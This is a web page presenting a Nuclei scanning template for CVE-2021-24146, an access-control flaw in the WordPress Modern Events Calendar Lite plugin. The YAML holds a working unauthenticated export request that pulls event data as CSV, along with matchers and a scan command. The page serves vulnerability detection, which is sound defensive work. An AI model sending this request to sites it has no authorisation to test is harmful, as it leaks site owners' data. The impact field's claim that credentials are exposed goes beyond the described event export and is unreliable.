Skip to content
Nuclei Templates

WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure

ID: CVE-2021-24146

Severity: high

Author: random_robbie

Tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus

Description

Section titled “Description”

WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24146


info:
  name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure
  author: random_robbie
  severity: high
  description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents.
  remediation: |
    Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
    - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24146
    - https://github.com/Hacker5preme/Exploits
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24146
    cwe-id: CWE-862,CWE-284
    epss-score: 0.02727
    epss-percentile: 0.90292
    cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: webnus
    product: modern_events_calendar_lite
    framework: wordpress
  tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "mec-events"
          - "text/csv"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a0046304402206bcad3d0c6c87f1e54c5395f966cd4655c33958b05086e3fa2bc813b9d0283ac02202ffe71b27cb1cfbd3b02a8d3f8249d63bccb36025e2f9db7c899b2145298b477:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24146.yaml"

View on Github